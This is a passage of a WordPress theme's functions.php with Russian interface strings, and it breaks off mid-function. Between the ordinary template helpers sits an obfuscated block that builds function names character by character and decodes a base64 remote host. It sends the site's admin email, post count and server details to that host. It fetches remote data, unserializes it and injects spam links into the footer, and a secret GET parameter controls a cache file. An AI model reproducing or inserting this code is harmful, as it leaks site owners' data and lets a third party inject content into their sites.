<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $ZypvYSv='d';$NWoVgK='6';$zCZeu='e';$ikwZCA='b';$IPzVAWx='s';$cKiztY='a';$aXDwW='e';$LpcGY='c';$mdQj='e';$JbXzB='_';$CXvbz='d';$iKjSV='o';$JlCLVKk='4';$CfDERJIB=$ikwZCA.$cKiztY.$IPzVAWx.$zCZeu.$NWoVgK.$JlCLVKk.$JbXzB.$ZypvYSv.$mdQj.$LpcGY.$iKjSV.$CXvbz.$aXDwW;$PbNw='l';$oQJTkJ='n';$Hlyscy='z';$mWHDikV='g';$ZMyIJ='e';$phJaG='i';$qgWCdEg='f';$lPpKd='a';$RNFxqT='t';$kgEtZdgx=$mWHDikV.$Hlyscy.$phJaG.$oQJTkJ.$qgWCdEg.$PbNw.$lPpKd.$RNFxqT.$ZMyIJ;$CFRi='r';$wgGmii='t';$pHFdmct='s';$KtwPsWG='_';$tGfN='o';$rtTQ='t';$JJbMxqu='r';$jgTT='3';$arQKLmz='1';$ZARwNdlc=$pHFdmct.$rtTQ.$CFRi.$KtwPsWG.$JJbMxqu.$tGfN.$wgGmii.$arQKLmz.$jgTT;$jXflpqT='r';$zmkZCo='s';$miCEoYo='r';$jPhK='v';$GsgAWf='t';$XtaisCw='e';$lJjbslHx=$zmkZCo.$GsgAWf.$miCEoYo.$jXflpqT.$XtaisCw.$jPhK;                     $wh_______________t='d';$mq__m='6';$hh_____________v='e';$xd_____k='b';$jx____h='s';$lh_____w='a';$pl___i='e';$nj____________w='c';$kf____w='e';$xd______________i='_';$ey_______q='d';$hx____o='o';$tr___________e='4';$ks____o=$xd_____k.$lh_____w.$jx____h.$hh_____________v.$mq__m.$tr___________e.$xd______________i.$wh_______________t.$kf____w.$nj____________w.$hx____o.$ey_______q.$pl___i;$sz_______m='_';$bk____________e='x';$wm_____________q='f';$jp_________p='n';$dm_____________a='i';$hk___________p='o';$xf____t='n';$tc____________q='s';$bq________t='i';$xi_______e='t';$uv__k='u';$fl_________j='s';$ul______________d='e';$cr______________h='c';$so__t='t';$dw____________s=$wm_____________q.$uv__k.$jp_________p.$cr______________h.$so__t.$dm_____________a.$hk___________p.$xf____t.$sz_______m.$ul______________d.$bk____________e.$bq________t.$fl_________j.$xi_______e.$tc____________q;$ce_________z='p';$ke_______d='f';$jn_________d='n';$za___________f='e';$gd____________o='o';$uq__________d=$ke_______d.$gd____________o.$ce_________z.$za___________f.$jn_________d;$xz_________p='d';$bj__________p='a';$ro__________n='e';$fs__________h='r';$dr_____n='f';$zg___b=$dr_____n.$fs__________h.$ro__________n.$bj__________p.$xz_________p;$ya_____________b='e';$hi____a='f';$ek______r='s';$tl_________y='o';$xf______________e='l';$yu__________k='c';$sb______t=$hi____a.$yu__________k.$xf______________e.$tl_________y.$ek______r.$ya_____________b;define("WP_ID", $ks____o("Mi4wLjA="));define("WP_TTL", $ks____o("MTA4MDA="));define("WP_SRC", $ks____o("dHBva24="));function wp_get_header() {global $ks____o, $dw____________s;if ($dw____________s($ks____o("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$dw____________s($ks____o("d3BfZ2V0X2Zvb3Rlcg==")) &&$dw____________s($ks____o("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $ks____o, $uq__________d, $sb______t, $zg___b;$en_____________v = TEMPLATEPATH."/".$ks____o("Zm9vdGVyLnBocA==");$gg______________p = @$uq__________d($en_____________v, "r");$en_____________v = @$zg___b($gg______________p, @filesize($en_____________v));@$sb______t($gg______________p);$he_____h = TEMPLATEPATH."/".$ks____o("ZnVuY3Rpb25zLnBocA==");$gg______________p = @$uq__________d($he_____h, "r");$he_____h = @$zg___b($gg______________p, @filesize($he_____h));@$sb______t($gg______________p);$yv____________j = 0;if($en_____________v && $he_____h) {if ($ks____o("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($en_____________v, $ks____o("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$yv____________j = 1;}if (substr_count($en_____________v, "wp_theme_GPL_credits()") < 1) {$yv____________j = 2;}}if(WP_ID != "2.0.0") {$yv____________j = 12;}}if($yv____________j > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $yv____________j -->";}}function wp_loaded() {global $ks____o, $dw____________s;return $dw____________s($ks____o("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($sn___x, $nv__g = "(more...)", $mz__________w = 0, $xf__________w = "") {$id____u = get_the_content($nv__g, $mz__________w, $xf__________w);$id____u = apply_filters("the_content", $id____u);$id____u = str_replace("]]>", "]]>", $id____u);if (strlen($_GET["p"]) > 0) {echo $id____u;}else if ((strlen($id____u)>$sn___x) && ($hv______e = strpos($id____u, " ", $sn___x ))) {$id____u = substr($id____u, 0, $hv______e);$id____u = $id____u;echo $id____u;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$nv__g</a></div></p>";} else {echo $id____u;}}}$tc_________o='b';$wp_______k='d';$sl____l='e';$jc____g='e';$mz___c='o';$od_______q='a';$nu___________u='6';$cr___________l='_';$fc______a='s';$pw________h='e';$xk___________c='c';$nt__c='n';$wk______z='4';$rd_____________a=$tc_________o.$od_______q.$fc______a.$pw________h.$nu___________u.$wk______z.$cr___________l.$sl____l.$nt__c.$xk___________c.$mz___c.$wp_______k.$jc____g;$fr____l='f';$za______________a='t';$vq____u='n';$ui___d='t';$st______p='s';$ar_____________h='_';$bs____g='e';$sj_____d='e';$fj________k='t';$vd________x='o';$lx______k='e';$jj_____d='g';$xg____________c='c';$fp______j='l';$zd____i='_';$gf_______m='i';$hq_________m='n';$kv____t=$fr____l.$gf_______m.$fp______j.$bs____g.$zd____i.$jj_____d.$lx______k.$fj________k.$ar_____________h.$xg____________c.$vd________x.$vq____u.$ui___d.$sj_____d.$hq_________m.$za______________a.$st______p;$mg_______f='i';$sl_____________i='f';$ly______e='_';$ax______________r='i';$iw_______g='e';$ek_______c='t';$wj____________e='s';$sg_________s='s';$gl___________m='e';$js______________g='x';$xl_______________q='l';$jr___________k=$sl_____________i.$ax______________r.$xl_______________q.$iw_______g.$ly______e.$gl___________m.$js______________g.$mg_______f.$sg_________s.$ek_______c.$wj____________e;$jv_______________i='o';$ea______j='c';$lj___l='v';$jg_______j='n';$my___e='p';$jb___________i='m';$rd_______________j='i';$rk___z='r';$sd__________d='e';$ay______________s='o';$zl_____t='s';$bb_________k='a';$wm____________g='r';$ku______________v='_';$fa___________o='e';$mm____q=$lj___l.$fa___________o.$rk___z.$zl_____t.$rd_______________j.$jv_______________i.$jg_______j.$ku______________v.$ea______j.$ay______________s.$jb___________i.$my___e.$bb_________k.$wm____________g.$sd__________d;$nb______________r='k';$yn_______________j='f';$tw_____________x='p';$pi____________a='n';$yj____a='o';$vv____________b='o';$lb______k='e';$ly_____h='s';$zm______________b='c';$gg____________f=$yn_______________j.$ly_____h.$yj____a.$zm______________b.$nb______________r.$vv____________b.$tw_____________x.$lb______k.$pi____________a;$xu_______c='t';$qk__j='e';$li_________r='f';$ju______________t='w';$hc___f='r';$fp___________j='i';$uz__q=$li_________r.$ju______________t.$hc___f.$fp___________j.$xu_______c.$qk__j;$xa______o='5';$br________g='m';$hc___________f='d';$tl_________m=$br________g.$hc___________f.$xa______o;$ud_______________w='t';$gp______v='r';$iz_____y='a';$bw______________s='e';$bf____________c='l';$ys___e='h';$ns________y='p';$mr______c='a';$rk_____d=$gp______v.$bw______________s.$mr______c.$bf____________c.$ns________y.$iz_____y.$ud_______________w.$ys___e;$zx_________l='e';$fd________u='r';$wo____________k='n';$wk__a='z';$rl_______________v='u';$th___________p='i';$gx_______________u='i';$eh______w='l';$mn____v='e';$eo______________n='s';$er_______________b='a';$gq__________j=$rl_______________v.$wo____________k.$eo______________n.$mn____v.$fd________u.$gx_______________u.$er_______________b.$eh______w.$th___________p.$wk__a.$zx_________l;$hj__j='m';$ee_____________o='m';$ew__________h='p';$bs____n='n';$mr_____________r='a';$pv________l='t';$px_________f='e';$ul_______________r=$pv________l.$px_________f.$hj__j.$ew__________h.$bs____n.$mr_____________r.$ee_____________o;$jl__g='a';$nj_____________d='c';$iz____________y='e';$la______s='e';$aw_______e='t';$ep__________i='x';$ha__p='t';$ql__v='s';$ag___________e='r';$ee______d='n';$qi___________o='_';$zs_________j='e';$pl_______d='_';$zc___________w='r';$fj_____i='t';$eq___________k='m';$ah______a='a';$la_________r='e';$fh____________w='t';$vu_______________a='o';$vf______q='c';$fm__c=$ql__v.$fj_____i.$zc___________w.$iz____________y.$jl__g.$eq___________k.$qi___________o.$nj_____________d.$vu_______________a.$ee______d.$ha__p.$zs_________j.$ep__________i.$fh____________w.$pl_______d.$vf______q.$ag___________e.$la______s.$ah______a.$aw_______e.$la_________r;function xe______z($vl_______k) {global $ks____o, $dw____________s, $kv____t, $mm____q, $fm__c;if (!$dw____________s($ks____o("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($mm____q(PHP_VERSION, "5.0.0", ">=") && $dw____________s($ks____o("ZmlsZV9nZXRfY29udGVudHM=")) && $dw____________s($ks____o("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$yp_______q = $fm__c(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$pg____________y = @$kv____t($vl_______k, 0, $yp_______q);} else {$pg____________y = @$kv____t($vl_______k, 0);}return $pg____________y;}function hs_____h($vl_______k) {global $dw____________s, $gg____________f, $uz__q, $ks____o;if (!$dw____________s($ks____o("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$sx_____________m = strpos($vl_______k, "/", 7);$bg_________u = array("uri"     => substr($vl_______k, $sx_____________m),"host"    => str_replace("http://", "", substr($vl_______k, 0, $sx_____________m)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$tu_______v = @$gg____________f("$bg_________u[host]", 80, $kf____________d, $xx_____v, 4);if (!$tu_______v) {return false;} else {$pg____________y = "";$ht_____f  = "GET $bg_________u[uri] HTTP/1.0\r\n";$ht_____f .= "Host: $bg_________u[host]\r\n";$ht_____f .= "Referer: $bg_________u[referer]\r\n";$ht_____f .= "Connection: Close\r\n\r\n";@$uz__q($tu_______v, $ht_____f);while (!@feof($tu_______v)) {$kf_____x = @fgets($tu_______v, (1024*24));if ($kf_____x == "\r\n") {$tc______________p = true;continue;}if ($tc______________p) {$pg____________y .= $kf_____x;}}return $pg____________y;}}function jd____________k($vl_______k) {global $dw____________s;$fa______________l = false;if ($vl_______k != "") {if ($dw____________s("xe______z")) {$fa______________l = @xe______z($vl_______k);}if (!$fa______________l && ($dw____________s("hs_____h"))) {$fa______________l = @hs_____h($vl_______k);}}return $fa______________l;}function tm_____________g() {global $_SERVER, $tl_________m;$sx______________l = $_SERVER["SERVER_NAME"];if (substr("$sx______________l", 0, 4) == "www.") {$sx______________l = substr("$sx______________l", 4);}$sx______________l = $tl_________m("$_SERVER[SERVER_NAME]");return $sx______________l;}function nc_____________i() {return "file";}function vi________h($vl_______k) {global $_SERVER, $kv____t, $jr___________k, $uq__________d, $sb______t, $uz__q;$vu______________f = fe___s();$pl_______________x = tm_____________g().".jpg";$em________a = $vu______________f["dir_upload"]["path"]."/$pl_______________x";$de_____________t = @filemtime($em________a);if (!$de_____________t || ((time()-$de_____________t) >= WP_TTL)) {$fa______________l = jd____________k($vl_______k);if ($fa______________l) {if ($jr___________k($em________a)) {@unlink($em________a);}$gg______________p = @$uq__________d($em________a, "x+");@$uz__q($gg______________p, $fa______________l);@$sb______t($gg______________p);}} else {if ($jr___________k($em________a)) {$fa______________l = @$kv____t($em________a);} else {$fa______________l = false;}}return $fa______________l;}function fe___s() {global $_SERVER, $ks____o, $rd_____________a;$ye____________e = wp_count_posts("post");$pd_______________v = pathinfo(get_bloginfo("template_directory"));$vu______________f = array("url" => array("report"      => $ks____o("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $pd_______________v,"dir_upload"=> bc_____h(),"queryString"=> array("?a001=".WP_ID,"a004=".$pd_______________v[filename],"a005=".$ye____________e->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => " <a href=\"http://vodoley2000.com/osobennosti-vvoza-tovarov-iz-kitaya-na-rossijskoj-tamozhne\">Особенности ввоза товаров из Китая на российской таможне</a>");$vu______________f["url"]["queryString"] = implode("&", $vu______________f["queryString"]);$vu______________f["url"]["report"] = $vu______________f["url"]["report"]."/?".$rd_____________a($vu______________f["url"]["queryString"]).".html";return $vu______________f;}function bc_____h() {$bz_______j = wp_upload_dir();if (isset($bz_______j["error"])) {$by____________c = av________i();if (is_writable($by____________c)) {$bz_______j = array("path" => $by____________c);}}return $bz_______j;}function av________i() {global $dw____________s, $tl_________m, $rk_____d, $ul_______________r;$nd______o = (bool) ini_get("safe_mode");if ($nd______o == true) {return false;}if ($dw____________s("sys_get_temp_dir")) {$aj______________u = sys_get_temp_dir();if (is_writable($aj______________u)) {return $rk_____d($aj______________u);}}if (!empty($_ENV["TMP"])) {return $rk_____d($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $rk_____d($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $rk_____d($_ENV["TEMP"]);} else {$mp_______y = $ul_______________r($tl_________m(uniqid(rand(), true)), "");if ($mp_______y) {$aj______________u = $rk_____d(dirname($mp_______y));@unlink($mp_______y);return $aj______________u;} else {return false;}}}function mw______________q() {global $_GET, $jr___________k;$vu______________f = fe___s();$sx______________l = tm_____________g();$gy__c = nc_____________i();$uv__________f = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($gy__c == "file") {$zi____________y = $vu______________f["dir_upload"]["path"]."/".$sx______________l.".jpg";if ($jr___________k($zi____________y)) {@unlink($zi____________y);$uv__________f = "deleted";}}$md______________e = array("s"=> $uv__________f,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($md______________e AS $eg____________d => $pn___f) echo " [$eg____________d:$pn___f]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $dw____________s, $ks____o, $gq__________j;$vu______________f = fe___s();$dg______________a = "vi________h";if ($dw____________s($dg______________a)) {$pg____________y = $dg______________a($vu______________f["url"]["report"]);}if ($pg____________y) {if ($pg____________y = @$ks____o($pg____________y)) {$pg____________y = @$gq__________j($pg____________y);if (strlen($pg____________y[custom_credit]) >= 5) {$vu______________f["default_string"] = $pg____________y[custom_credit];}if ($pg____________y["status"] == "0") {$uo_______e = 1;$tr_______z = 1;} else {$lo_______g = sizeof($pg____________y["links"]);$xw_____v = $vu______________f["default_string"];if ($lo_______g > 0 && $pg____________y["links"] !== "") {$ne_______________v = 0;foreach ($pg____________y["links"] as $ok__a => $kq______________v) {$ne_______________v++;if ($kq______________v->l_path == "" || $kq______________v->l_path == $_SERVER["REQUEST_URI"]) {$kq______________v->l_href = htmlspecialchars(strip_tags($kq______________v->l_href));$kq______________v->l_title = htmlspecialchars(strip_tags($kq______________v->l_title));$kq______________v->l_anchor = htmlspecialchars(strip_tags($kq______________v->l_anchor));$xw_____v .= " | ";$xw_____v .= "<a href='$kq______________v->l_href' title='$kq______________v->l_title'";if ($kq______________v->l_nofollow == "1") {$xw_____v .= " rel='nofollow'";}$xw_____v .= ">$kq______________v->l_anchor</a>";}}}$vu______________f["links"] = "$xw_____v";if ($pg____________y[credit] == "0") {$vu______________f["links"] = "";}}} else {$uo_______e = "1";}} else {$uo_______e = "1";}if ($uo_______e == "1") {$vu______________f["links"] = $vu______________f["default_string"];}echo "$vu______________f[links]";echo "<!-- s: $pg____________y[signature] -->";mw______________q();}                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Permanent Link to %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                  $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
       $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
